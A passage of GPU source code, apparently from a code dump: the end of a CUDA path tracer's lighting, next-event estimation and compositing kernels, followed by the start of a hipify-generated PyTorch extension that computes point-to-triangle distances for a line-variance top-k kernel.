(1.0f / 1.5f) : 1.5f; ln_facet[0] = ld_i[0] + ld_o[0] * ior; ln_facet[1] = ld_i[1] + ld_o[1] * ior; ln_facet[2] = ld_i[2] + ld_o[2] * ior; NORMALIZE(ln_facet); } if (ln_facet[2] < 0.0f) { ln_facet[0] *= -1.0f; ln_facet[1] *= -1.0f; ln_facet[2] *= -1.0f; } float dot_ni = DOT(ld_i, ln_facet); float d, gi, go, g; GGX_EVAL(ln_facet, roughness, d); float cos_theta_t, fresnel; DIELECTRIC_FRESNEL(dot_ni, 1.5f, cos_theta_t, fresnel); SMITH_G1(ld_i, ln_facet, roughness, gi); SMITH_G1(ld_o, ln_facet, roughness, go); g = gi * go; if (!refract) { // Reflect/transmit to diffuse. float reflect_sample; PRNG(global_id, b_seeds_2.y, reflect_sample); if (glass_material || (reflect_sample <= (fresnel * coating_dropoff))) { // Reflection if ((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { if ((d == 0.0f) || (ld_i[2] == 0.0f)) { sun_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } else { float model = fresnel * coating_dropoff * d * g / (4.0f * fabs(ld_i[2])); brdf_color[0] = model; brdf_color[1] = model; brdf_color[2] = model; float prob; prob = gi * fabs(dot_ni) * d / fabs(ld_i[2]); prob *= fresnel * coating_dropoff; float dwh_dwo = 1.0f / (4.0f * DOT(ld_o, ln_facet)); brdf_pdf = fabs(prob * dwh_dwo); } } else { sun_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } } else { // Transmit to diffuse brdf_color[0] = albedo[0]; brdf_color[1] = albedo[1]; brdf_color[2] = albedo[2]; brdf_pdf = INV_PI * ld_o[2]; } } else { // Refraction if ((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { if ((d == 0.0f) || (ld_i[2] == 0.0f)) { sun_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } else { float ior = (ld_i[2] < 0.0f) ? (1.0f / 1.5f) : 1.5f; float dot_no = DOT(ln_facet, ld_o); float sqrt_denom = dot_ni + ior * dot_no; float model = ((1.0f - fresnel) * d * g * ior * ior * dot_ni * dot_no) / (ld_i[2] * sqrt_denom * sqrt_denom); model *= (ld_i[2] < 0.0f) ? 
1.5f : (1.0f / 1.5f); brdf_color[0] = albedo[0] * model; brdf_color[1] = albedo[1] * model; brdf_color[2] = albedo[2] * model; float prob; prob = gi * fabs(dot_ni) * d / fabs(ld_i[2]); prob *= fresnel * coating_dropoff; float dwh_dwo = (ior * ior * dot_no) / (sqrt_denom * sqrt_denom); brdf_pdf = fabs(prob * dwh_dwo); } } else { sun_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } } } else { // Conductor if ((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { float dot_ni = DOT(ln_facet, ld_i); float d, f, g, gi, go; GGX_EVAL(ln_facet, roughness, d); CONDUCTOR_FRESNEL(dot_ni, 1.5f, 3.0f, f); SMITH_G1(ld_i, ln_facet, roughness, gi); SMITH_G1(ld_o, ln_facet, roughness, go); g = gi * go; float model = f * (d * g / (4.0f * ld_i[2])); brdf_color[0] = albedo[0] * model; brdf_color[1] = albedo[1] * model; brdf_color[2] = albedo[2] * model; brdf_pdf = d * gi / (4.0f * ld_i[2]); } else { sun_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } } float mis = MIS(sun_pdf, brdf_pdf); ray_state[RS_SUN_R] = old_throughput[0] * (sun_color[0] / NOT_ZERO(sun_pdf)) * brdf_color[0] * mis; ray_state[RS_SUN_G] = old_throughput[1] * (sun_color[1] / NOT_ZERO(sun_pdf)) * brdf_color[1] * mis; ray_state[RS_SUN_B] = old_throughput[2] * (sun_color[2] / NOT_ZERO(sun_pdf)) * brdf_color[2] * mis; } } float o[3]; o[0] = ray_state[RS_ORIGIN_X]; o[1] = ray_state[RS_ORIGIN_Y]; o[2] = ray_state[RS_ORIGIN_Z]; float emitter_d[3]; emitter_d[0] = FLT_MAX; if (emitter_count > 0) { float emitter_uv_sample[2]; PRNG(global_id, b_seeds_2.z, emitter_uv_sample[0]); PRNG(global_id, b_seeds_2.w, emitter_uv_sample[1]); if ((emitter_uv_sample[0] + emitter_uv_sample[1]) >= 1.0f) { emitter_uv_sample[0] = 1.0f - emitter_uv_sample[0]; emitter_uv_sample[1] = 1.0f - emitter_uv_sample[1]; } float emit_u = emitter_uv_sample[0]; float emit_v = emitter_uv_sample[1]; float emit_w = 1.0f - emit_u - emit_v; float emitter_sample; PRNG(global_id, b_seeds_3.x, emitter_sample); uint emitter_choice = emitter_sample * emitter_count; EmitterIndex emitter_index = emitters[emitter_choice]; uint32_t emitter_tri_index = emitter_index.mesh_triangle_offset + emitter_index.triangle_offset; uint32_t tri_pixel = emitter_tri_index * 42; float emitter_position[3]; if (use_triangles_image) { emitter_position[0] = tex1Dfetch<float>(triangles_image, TRI_VERTEX) + (emit_u * tex1Dfetch<float>(triangles_image, TRI_EDGES_0)) + (emit_v * -tex1Dfetch<float>(triangles_image, TRI_EDGES_1)); emitter_position[1] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 1) + (emit_u * tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 1)) + (emit_v * -tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 1)); emitter_position[2] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 2) + (emit_u * tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 2)) + (emit_v * -tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 2)); } else { emitter_position[0] = triangles[emitter_tri_index].vertex[0] + (emit_u * triangles[emitter_tri_index].edges[0][0]) + (emit_v * -triangles[emitter_tri_index].edges[1][0]); emitter_position[1] = triangles[emitter_tri_index].vertex[1] + (emit_u * triangles[emitter_tri_index].edges[0][1]) + (emit_v * -triangles[emitter_tri_index].edges[1][1]); emitter_position[2] = triangles[emitter_tri_index].vertex[2] + (emit_u * triangles[emitter_tri_index].edges[0][2]) + (emit_v * -triangles[emitter_tri_index].edges[1][2]); } emitter_d[0] = emitter_position[0] - o[0]; emitter_d[1] = emitter_position[1] - o[1]; emitter_d[2] = emitter_position[2] - o[2]; float t_2 = DOT(emitter_d, emitter_d); float t = sqrt(t_2); 
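// Emitter next-event estimation: emitter_d still holds the un-normalized
// vector from the shading point o to the point sampled uniformly (via folded
// barycentrics) on the chosen emitter triangle; t and t_2 are its length and
// squared length. Below, t_2 / |cos_at_emitter| converts the per-area density
// (inverse_area * emitter_prob) into the solid-angle emitter_pdf used for MIS.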
ray_state[RS_EMITTER_T] = t; float inv_t = 1.0f / t; emitter_d[0] *= inv_t; emitter_d[1] *= inv_t; emitter_d[2] *= inv_t; float emitter_n[3]; float inverse_area; uint mat_id; if (use_triangles_image) { mat_id = tex1Dfetch<uint32_t>(triangles_image, TRI_MAT_ID); inverse_area = tex1Dfetch<float>(triangles_image, TRI_INV_AREA); emitter_n[0] = emit_w * tex1Dfetch<float>(triangles_image, TRI_VN_0) + emit_u * tex1Dfetch<float>(triangles_image, TRI_VN_1) + emit_v * tex1Dfetch<float>(triangles_image, TRI_VN_2); emitter_n[1] = emit_w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 1) + emit_u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 1) + emit_v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 1); emitter_n[2] = emit_w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 2) + emit_u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 2) + emit_v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 2); } else { mat_id = triangles[emitter_tri_index].material_id; inverse_area = triangles[emitter_tri_index].inverse_area; emitter_n[0] = emit_w * triangles[emitter_tri_index].vertex_normals[0][0] + emit_u * triangles[emitter_tri_index].vertex_normals[1][0] + emit_v * triangles[emitter_tri_index].vertex_normals[2][0]; emitter_n[1] = emit_w * triangles[emitter_tri_index].vertex_normals[0][1] + emit_u * triangles[emitter_tri_index].vertex_normals[1][1] + emit_v * triangles[emitter_tri_index].vertex_normals[2][1]; emitter_n[2] = emit_w * triangles[emitter_tri_index].vertex_normals[0][2] + emit_u * triangles[emitter_tri_index].vertex_normals[1][2] + emit_v * triangles[emitter_tri_index].vertex_normals[2][2]; } NORMALIZE(emitter_n); float cos_at_emitter = DOT(-emitter_d, emitter_n); float cos_at_tri = DOT(emitter_d, n); if ((cos_at_emitter <= 0.0f) || (cos_at_tri <= 0.0f) || (t_2 < (HI_EPSILON * 4.0f))) { emitter_d[0] = FLT_MAX; } else { float brdf_color[3]; float brdf_pdf; float emitter_prob = 1.0f / (float)emitter_count; float emitter_pdf = inverse_area * (t_2 / fabs(cos_at_emitter)) * emitter_prob; float intensity = materials[mat_id].emission * 25.0f; float emitter_color[3]; float uv[2]; if (materials[mat_id].map_flags & MAP_FLAG_EMISSION) { float2 emission_uv; if (use_triangles_image) { emission_uv.x = emit_w * tex1Dfetch<float>(triangles_image, TRI_UV_0) + emit_u * tex1Dfetch<float>(triangles_image, TRI_UV_1) + emit_v * tex1Dfetch<float>(triangles_image, TRI_UV_2); emission_uv.y = emit_w * tex1Dfetch<float>(triangles_image, TRI_UV_0 + 1) + emit_u * tex1Dfetch<float>(triangles_image, TRI_UV_1 + 1) + emit_v * tex1Dfetch<float>(triangles_image, TRI_UV_2 + 1); } else { emission_uv.x = emit_w * triangles[emitter_tri_index].vertex_uvs[0][0] + emit_u * triangles[emitter_tri_index].vertex_uvs[1][0] + emit_v * triangles[emitter_tri_index].vertex_uvs[2][0]; emission_uv.y = emit_w * triangles[emitter_tri_index].vertex_uvs[0][1] + emit_u * triangles[emitter_tri_index].vertex_uvs[1][1] + emit_v * triangles[emitter_tri_index].vertex_uvs[2][1]; } emission_uv.x = lerp(materials[mat_id].emission_bounds[0] + 0.5f, materials[mat_id].emission_bounds[1] - 0.5f, emission_uv.x); emission_uv.y = lerp(materials[mat_id].emission_bounds[2] + 0.5f, materials[mat_id].emission_bounds[3] - 0.5f, emission_uv.y); float4 emission_map = tex2D<float4>(emission_atlas, emission_uv.x, emission_uv.y); emitter_color[0] = emission_map.y * intensity; emitter_color[1] = emission_map.z * intensity; emitter_color[2] = emission_map.w * intensity; } else { emitter_color[0] = materials[mat_id].albedo[0] * intensity; emitter_color[1] = materials[mat_id].albedo[1] 
* intensity; emitter_color[2] = materials[mat_id].albedo[2] * intensity; } if (fmax(fmax(emitter_color[0], emitter_color[1]), emitter_color[2]) > 0.0f) { emitter_color[0] /= emitter_pdf; emitter_color[1] /= emitter_pdf; emitter_color[2] /= emitter_pdf; float ld_o[3]; RELATIVE_TO_BASIS(emitter_d, n, n_tangent, n_binormal, ld_o); float roughness[2] = { 1.0f - smoothness, 1.0f - smoothness }; float ln_facet[3]; ln_facet[0] = ld_i[0] + ld_o[0]; ln_facet[1] = ld_i[1] + ld_o[1]; ln_facet[2] = ld_i[2] + ld_o[2]; NORMALIZE(ln_facet); float coating_dropoff = fmin(smoothness * 2.0f, 1.0f); float sample_dice; PRNG(global_id, b_seeds_2.x, sample_dice); if (glass_material || (sample_dice >= metallic)) { // Dielectric interface bool refract = (ld_i[2] * ld_o[2]) <= 0.0f; if (refract) { // Refraction facet float ior = (ld_i[2] < 0.0f) ? (1.0f / 1.5f) : 1.5f; ln_facet[0] = ld_i[0] + ld_o[0] * ior; ln_facet[1] = ld_i[1] + ld_o[1] * ior; ln_facet[2] = ld_i[2] + ld_o[2] * ior; NORMALIZE(ln_facet); } if (ln_facet[2] < 0.0f) { ln_facet[0] *= -1.0f; ln_facet[1] *= -1.0f; ln_facet[2] *= -1.0f; } float dot_ni = DOT(ld_i, ln_facet); float d, gi, go, g; GGX_EVAL(ln_facet, roughness, d); float cos_theta_t, fresnel; DIELECTRIC_FRESNEL(dot_ni, 1.5f, cos_theta_t, fresnel); SMITH_G1(ld_i, ln_facet, roughness, gi); SMITH_G1(ld_o, ln_facet, roughness, go); g = gi * go; if (!refract) { // Reflect/transmit to diffuse. float reflect_sample; PRNG(global_id, b_seeds_2.y, reflect_sample); if (glass_material || (reflect_sample <= (fresnel * coating_dropoff))) { // Reflection if ((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { if ((d == 0.0f) || (ld_i[2] == 0.0f)) { emitter_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } else { float model = fresnel * coating_dropoff * d * g / (4.0f * fabs(ld_i[2])); brdf_color[0] = model; brdf_color[1] = model; brdf_color[2] = model; float prob; prob = gi * fabs(dot_ni) * d / fabs(ld_i[2]); prob *= fresnel * coating_dropoff; float dwh_dwo = 1.0f / (4.0f * DOT(ld_o, ln_facet)); brdf_pdf = fabs(prob * dwh_dwo); } } else { emitter_d[0] = FLT_MAX; } } else { // Transmit to diffuse brdf_color[0] = albedo[0]; brdf_color[1] = albedo[1]; brdf_color[2] = albedo[2]; brdf_pdf = INV_PI * ld_o[2]; } } else { // Refraction if ((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { if ((d == 0.0f) || (ld_i[2] == 0.0f)) { emitter_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } else { float ior = (ld_i[2] < 0.0f) ? (1.0f / 1.5f) : 1.5f; float dot_no = DOT(ln_facet, ld_o); float sqrt_denom = dot_ni + ior * dot_no; float model = ((1.0f - fresnel) * d * g * ior * ior * dot_ni * dot_no) / (ld_i[2] * sqrt_denom * sqrt_denom); model *= (ld_i[2] < 0.0f) ? 
1.5f : (1.0f / 1.5f); brdf_color[0] = albedo[0] * model; brdf_color[1] = albedo[1] * model; brdf_color[2] = albedo[2] * model; float prob; prob = gi * fabs(dot_ni) * d / fabs(ld_i[2]); prob *= fresnel * coating_dropoff; float dwh_dwo = (ior * ior * dot_no) / (sqrt_denom * sqrt_denom); brdf_pdf = fabs(prob * dwh_dwo); } } else { emitter_d[0] = FLT_MAX; } } } else { // Conductor if ((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { float dot_ni = DOT(ln_facet, ld_i); float d, f, g, gi, go; GGX_EVAL(ln_facet, roughness, d); CONDUCTOR_FRESNEL(dot_ni, 1.5f, 3.0f, f); SMITH_G1(ld_i, ln_facet, roughness, gi); SMITH_G1(ld_o, ln_facet, roughness, go); g = gi * go; float model = f * (d * g / (4.0f * ld_i[2])); brdf_color[0] = albedo[0] * model; brdf_color[1] = albedo[1] * model; brdf_color[2] = albedo[2] * model; brdf_pdf = d * gi / (4.0f * ld_i[2]); } else { emitter_d[0] = FLT_MAX; } } } else { emitter_d[0] = FLT_MAX; } float mis = MIS(emitter_pdf, brdf_pdf); ray_state[RS_EMITTER_R] = old_throughput[0] * emitter_color[0] * brdf_color[0] * mis; ray_state[RS_EMITTER_G] = old_throughput[1] * emitter_color[1] * brdf_color[1] * mis; ray_state[RS_EMITTER_B] = old_throughput[2] * emitter_color[2] * brdf_color[2] * mis; } } ray_state[RS_SUN_D_X] = sun_d[0]; ray_state[RS_SUN_D_Y] = sun_d[1]; ray_state[RS_SUN_D_Z] = sun_d[2]; ray_state[RS_EMITTER_D_X] = emitter_d[0]; ray_state[RS_EMITTER_D_Y] = emitter_d[1]; ray_state[RS_EMITTER_D_Z] = emitter_d[2]; } /// __global__ void NEE(float* ray_state, Material* materials, int32_t use_nodes_image, cudaTextureObject_t nodes_image, TwoNode* nodes, int32_t top_tree_offset, int32_t use_triangles_image, cudaTextureObject_t triangles_image, TreeTriangle* triangles, cudaTextureObject_t albedo_atlas, cudaTextureObject_t emission_atlas, uint4 b_seeds, int32_t width, int32_t height) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int state = ray_state[RS_STATE]; if (state == STATE_END) { return; } float o[3]; o[0] = ray_state[RS_ORIGIN_X]; o[1] = ray_state[RS_ORIGIN_Y]; o[2] = ray_state[RS_ORIGIN_Z]; float sun_d[3]; sun_d[0] = ray_state[RS_SUN_D_X]; if (sun_d[0] < FLT_MAX) { sun_d[1] = ray_state[RS_SUN_D_Y]; sun_d[2] = ray_state[RS_SUN_D_Z]; float sun_o[3]; sun_o[0] = o[0] + (sun_d[0] * EPSILON); sun_o[1] = o[1] + (sun_d[1] * EPSILON); sun_o[2] = o[2] + (sun_d[2] * EPSILON); float h_t = FLT_MAX; OCCLUSION(sun_o, sun_d, use_nodes_image, use_triangles_image); if (h_t == FLT_MAX) { ray_state[RS_COLOR_R] += ray_state[RS_SUN_R]; ray_state[RS_COLOR_G] += ray_state[RS_SUN_G]; ray_state[RS_COLOR_B] += ray_state[RS_SUN_B]; } } float emitter_d[3]; emitter_d[0] = ray_state[RS_EMITTER_D_X]; if (emitter_d[0] < FLT_MAX) { emitter_d[1] = ray_state[RS_EMITTER_D_Y]; emitter_d[2] = ray_state[RS_EMITTER_D_Z]; float emitter_o[3]; emitter_o[0] = o[0] + (emitter_d[0] * EPSILON); emitter_o[1] = o[1] + (emitter_d[1] * EPSILON); emitter_o[2] = o[2] + (emitter_d[2] * EPSILON); float emitter_t = ray_state[RS_EMITTER_T] - (2.0f * EPSILON); float h_t = emitter_t; OCCLUSION(emitter_o, emitter_d, use_nodes_image, use_triangles_image); if (h_t == emitter_t) { ray_state[RS_COLOR_R] += ray_state[RS_EMITTER_R]; ray_state[RS_COLOR_G] += ray_state[RS_EMITTER_G]; ray_state[RS_COLOR_B] += ray_state[RS_EMITTER_B]; } } float throughput[3]; throughput[0] = ray_state[RS_THROUGHPUT_R]; throughput[1] = ray_state[RS_THROUGHPUT_G]; throughput[2] = ray_state[RS_THROUGHPUT_B]; float tp = fmax(fmax(throughput[0], throughput[1]), throughput[2]); if (tp <= 
THROUGHPUT_THRESHOLD) { ray_state[RS_STATE] = STATE_END; } else { float roulette_prob = tp; if (roulette_prob <= 1.0f) { float roulette; PRNG(global_id, b_seeds.z, roulette); if (roulette < roulette_prob) { float modify_throughput = 1.0f / roulette_prob; ray_state[RS_THROUGHPUT_R] = throughput[0] * modify_throughput; ray_state[RS_THROUGHPUT_G] = throughput[1] * modify_throughput; ray_state[RS_THROUGHPUT_B] = throughput[2] * modify_throughput; } else { ray_state[RS_STATE] = STATE_END; } } } } /// __global__ void Accumulate(float* ray_state, cudaSurfaceObject_t target, ImageProperties image_properties, int32_t width, int32_t height, float inv_sample_count) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } float rgb[3]; rgb[0] = ray_state[RS_COLOR_R]; rgb[1] = ray_state[RS_COLOR_G]; rgb[2] = ray_state[RS_COLOR_B]; AVG_TONEMAP(rgb); float lum_coeff[3]; lum_coeff[0] = 0.2125f; lum_coeff[1] = 0.7154f; lum_coeff[2] = 0.0721f; float bright_rgb[3]; bright_rgb[0] = rgb[0] * image_properties.brightness; bright_rgb[1] = rgb[1] * image_properties.brightness; bright_rgb[2] = rgb[2] * image_properties.brightness; float intensity = DOT(bright_rgb, lum_coeff); float sat_color[3]; sat_color[0] = lerp(intensity, bright_rgb[0], image_properties.saturation); sat_color[1] = lerp(intensity, bright_rgb[1], image_properties.saturation); sat_color[2] = lerp(intensity, bright_rgb[2], image_properties.saturation); rgb[0] = lerp(0.5f, sat_color[0], image_properties.contrast); rgb[1] = lerp(0.5f, sat_color[1], image_properties.contrast); rgb[2] = lerp(0.5f, sat_color[2], image_properties.contrast); uchar4 target_color = make_uchar4(saturate(rgb[0]) * 255.0f, saturate(rgb[1]) * 255.0f, saturate(rgb[2]) * 255.0f, 255); int32_t x = global_id % width; int32_t y = global_id / width; surf2Dwrite(target_color, target, x * sizeof(uchar4), y, cudaBoundaryModeClamp); } /// __global__ void CompositeTwo(cudaSurfaceObject_t compositing_target_one, cudaTextureObject_t compositing_target_two, cudaSurfaceObject_t target, int32_t width, int32_t height) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t x = global_id % width; int32_t y = global_id / width; uint4 c0 = make_uint4(surf2Dread<uchar4>(compositing_target_one, x * sizeof(uchar4), y, cudaBoundaryModeClamp)); uint4 c1 = make_uint4(tex2D<uchar4>(compositing_target_two, x, y)); uint4 color = (c0 + c1) / make_uint4(2); uchar4 target_color = make_uchar4(color, 255); surf2Dwrite(target_color, target, x * sizeof(uchar4), y, cudaBoundaryModeClamp); } /// __global__ void CompositeThree(cudaSurfaceObject_t compositing_target_one, cudaTextureObject_t compositing_target_two, cudaTextureObject_t compositing_target_three, cudaSurfaceObject_t target, int32_t width, int32_t height) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t x = global_id % width; int32_t y = global_id / width; uint4 c0 = make_uint4(surf2Dread<uchar4>(compositing_target_one, x * sizeof(uchar4), y, cudaBoundaryModeClamp)); uint4 c1 = make_uint4(tex2D<uchar4>(compositing_target_two, x, y)); uint4 c2 = make_uint4(tex2D<uchar4>(compositing_target_three, x, y)); uint4 color = (c0 + c1 + c2) / make_uint4(3); uchar4 target_color = make_uchar4(color, 255); surf2Dwrite(target_color, target, x * sizeof(uchar4), y, cudaBoundaryModeClamp); } /// __global__ void CompositeFour(cudaSurfaceObject_t compositing_target_one, 
cudaTextureObject_t compositing_target_two, cudaTextureObject_t compositing_target_three, cudaTextureObject_t compositing_target_four, cudaSurfaceObject_t target, int32_t width, int32_t height) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t x = global_id % width; int32_t y = global_id / width; uint4 c0 = make_uint4(surf2Dread<uchar4>(compositing_target_one, x * sizeof(uchar4), y, cudaBoundaryModeClamp)); uint4 c1 = make_uint4(tex2D<uchar4>(compositing_target_two, x, y)); uint4 c2 = make_uint4(tex2D<uchar4>(compositing_target_three, x, y)); uint4 c3 = make_uint4(tex2D<uchar4>(compositing_target_four, x, y)); uint4 color = (c0 + c1 + c2 + c3) / make_uint4(4); uchar4 target_color = make_uchar4(color, 255); surf2Dwrite(target_color, target, x * sizeof(uchar4), y, cudaBoundaryModeClamp); } /// __global__ void CompositeFive(cudaSurfaceObject_t compositing_target_one, cudaTextureObject_t compositing_target_two, cudaTextureObject_t compositing_target_three, cudaTextureObject_t compositing_target_four, cudaTextureObject_t compositing_target_five, cudaSurfaceObject_t target, int32_t width, int32_t height) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t x = global_id % width; int32_t y = global_id / width; uint4 c0 = make_uint4(surf2Dread<uchar4>(compositing_target_one, x * sizeof(uchar4), y, cudaBoundaryModeClamp)); uint4 c1 = make_uint4(tex2D<uchar4>(compositing_target_two, x, y)); uint4 c2 = make_uint4(tex2D<uchar4>(compositing_target_three, x, y)); uint4 c3 = make_uint4(tex2D<uchar4>(compositing_target_four, x, y)); uint4 c4 = make_uint4(tex2D<uchar4>(compositing_target_five, x, y)); uint4 color = (c0 + c1 + c2 + c3 + c4) / make_uint4(5); uchar4 target_color = make_uchar4(color, 255); surf2Dwrite(target_color, target, x * sizeof(uchar4), y, cudaBoundaryModeClamp); } }
95d164da8469151c12074541f08d60ecdebe4aed.hip
// !!! This is a file automatically generated by hipify!!! #include <ATen/ATen.h> #include <hip/hip_runtime.h> #include <hip/hip_runtime.h> #include <assert.h> #include <THH/THH.h> #include <vector> #include <torch/torch.h> #include <torch/extension.h> #define eps 1e-10 #define SCALE 1.0 #define MAX_DIS 9999999999.0 //extern THCState * state; template<typename scalar_t> __host__ __device__ scalar_t line_variance_topk_cuda_abs(scalar_t a){ if (a > 0.0){ return a; } else{ return -a; } } template<typename scalar_t> __host__ __device__ scalar_t line_variance_topk_cuda_square(scalar_t a){ return a * a; } template<typename scalar_t> __host__ __device__ scalar_t line_variance_topk_cuda_divide_non_zero(scalar_t a){ if (a == 0){ return eps; } if (a < 0){ return a - eps; } if (a > 0){ return a + eps; } return eps; } template<typename scalar_t> __host__ __device__ scalar_t line_variance_topk_cuda_min_dis(scalar_t a, scalar_t b, scalar_t c){ scalar_t min_d = a; if (b < min_d){ min_d = b; } if (c < min_d){ min_d = c; } return min_d; } template<typename scalar_t> __host__ __device__ scalar_t line_variance_topk_cuda_min_dis_idx(scalar_t a, scalar_t b, scalar_t c){ scalar_t min_d = a; int min_idx = 0; if (b < min_d){ min_d = b; min_idx = 1; } if (c < min_d){ min_d = c; min_idx = 2; } return min_idx; } template <typename scalar_t> __host__ __device__ scalar_t distance_line(scalar_t x1, scalar_t y1, scalar_t x2, scalar_t y2, scalar_t x, scalar_t y){ scalar_t dx1x2 = -x1 + x2; scalar_t dy1y2 = -y1 + y2; scalar_t dx1x = x - x1; scalar_t dy1y = y - y1; scalar_t c1 = - x * x1 + x * x2 + x1 * x1 - x1 * x2 - y * y1 + y * y2 + y1 * y1 - y1 * y2; scalar_t c2 = x1 * x1 - 2 * x1 * x2 + x2 * x2 + y1 * y1 - 2 * y1 * y2 + y2 * y2; scalar_t d1 = -dx1x + dx1x2 * c1 / line_variance_topk_cuda_divide_non_zero(c2); scalar_t d2 = -dy1y + dy1y2 * c1 / line_variance_topk_cuda_divide_non_zero(c2); scalar_t dis = line_variance_topk_cuda_abs(d1) + line_variance_topk_cuda_abs(d2); return dis; } template <typename scalar_t> __host__ __device__ scalar_t distance_point(scalar_t x1, scalar_t y1, scalar_t x, scalar_t y){ return line_variance_topk_cuda_abs(x - x1) + line_variance_topk_cuda_abs(y - y1); } template <typename scalar_t> __host__ __device__ void distance(scalar_t* ret, scalar_t x1, scalar_t y1, scalar_t x2, scalar_t y2, scalar_t x3, scalar_t y3, scalar_t x, scalar_t y) { //https://en.wikipedia.org/wiki/Barycentric_coordinate_system scalar_t x1_x2 = x1 - x2; scalar_t y1_y2 = y1 - y2; scalar_t x1_x3 = x1 - x3; scalar_t y1_y3 = y1 - y3; scalar_t x2_x3 = x2 - x3; scalar_t y2_y3 = y2 - y3; scalar_t x_x1 = x - x1; scalar_t y_y1 = y - y1; scalar_t x_x2 = x - x2; scalar_t y_y2 = y - y2; scalar_t x_x3 = x - x3; scalar_t y_y3 = y - y3; scalar_t k1 = y2_y3 * x_x3 - x2_x3 * y_y3; scalar_t k2 = x1_x3 * y_y3 - y1_y3 * x_x3; scalar_t k3 = y2_y3 * x1_x3 - x2_x3 * y1_y3; if(k3 == 0){ // not a legal triangle ret[0] = -2; return; } if(k3 > 0){ // clock-wise triangle ret[0] = -1; return; } //scalar_t l1 = k1 / line_variance_topk_cuda_divide_non_zero(k3); //scalar_t l2 = k2 / line_variance_topk_cuda_divide_non_zero(k3); scalar_t l1 = k1 / k3; scalar_t l2 = k2 / k3; scalar_t l3 = 1 - l1 - l2; scalar_t dis12 = distance_line(x1, y1, x2, y2, x, y); scalar_t dis23 = distance_line(x2, y2, x3, y3, x, y); scalar_t dis13 = distance_line(x1, y1, x3, y3, x, y); if (l1 >= 0 && l2 >= 0 && l3 >= 0){ // lie inside or on the boundary scalar_t min_dis_line = line_variance_topk_cuda_min_dis(dis12, dis23, dis13); scalar_t min_dis_line_idx = 
line_variance_topk_cuda_min_dis_idx(dis12, dis23, dis13); ret[0] = 0; ret[1] = min_dis_line; ret[2] = min_dis_line_idx; return; } // whether point can calculate distance to certain line bool within12 = ((y1_y2 * y_y1 + x_x1 * x1_x2) * (y1_y2 * y_y2 + x_x2 * x1_x2)) <= 0; bool within23 = ((y2_y3 * y_y3 + x_x3 * x2_x3) * (y2_y3 * y_y2 + x_x2 * x2_x3)) <= 0; bool within13 = ((y1_y3 * y_y1 + x_x1 * x1_x3) * (y1_y3 * y_y3 + x_x3 * x1_x3)) <= 0; dis12 = within12 ? dis12 : MAX_DIS; dis23 = within23 ? dis23 : MAX_DIS; dis13 = within13 ? dis13 : MAX_DIS; scalar_t min_dis_line = line_variance_topk_cuda_min_dis(dis12, dis23, dis13); scalar_t min_dis_line_idx = line_variance_topk_cuda_min_dis_idx(dis12, dis23, dis13); scalar_t d1 = distance_point(x1, y1, x, y); scalar_t d2 = distance_point(x2, y2, x, y); scalar_t d3 = distance_point(x3, y3, x, y); scalar_t min_dis_point = line_variance_topk_cuda_min_dis(d1, d2, d3); scalar_t min_dis_point_idx = line_variance_topk_cuda_min_dis_idx(d1, d2, d3); if (min_dis_line < min_dis_point){ ret[0] = 1; ret[1] = min_dis_line; ret[2] = min_dis_line_idx; } else{ ret[0] = 2; ret[1] = min_dis_point; ret[2] = min_dis_point_idx; } } template <typename scalar_t> __global__ void line_variance_topk_cuda_forward_kernel_batch( const torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> img_fea_bxnxd, const torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> grid_fea_bxkxd, const torch::PackedTensorAccessor<scalar_t, 4, torch::RestrictPtrTraits, size_t> grid_bxkx3x2, const torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> img_pos_bxnx2, torch::PackedTensorAccessor<scalar_t, 2, torch::RestrictPtrTraits, size_t> variance_bxn, torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> reconstruct_bxnxd, torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> topk_grid_bxnxk, torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> buffer_bxnxk, int bnum, int n_pixel, int topk, int d_fea, float sigma) { // bidx * height + heiidx int presentthread = blockIdx.x * blockDim.x + threadIdx.x; int pixel_idx = presentthread % n_pixel; int bidx = (presentthread - pixel_idx) / n_pixel; if (bidx >= bnum || pixel_idx >= n_pixel) { return; } ///////////////////////////////////////////////////////////////// // which pixel it belongs to int total_idx = bidx * n_pixel * topk + pixel_idx * topk; 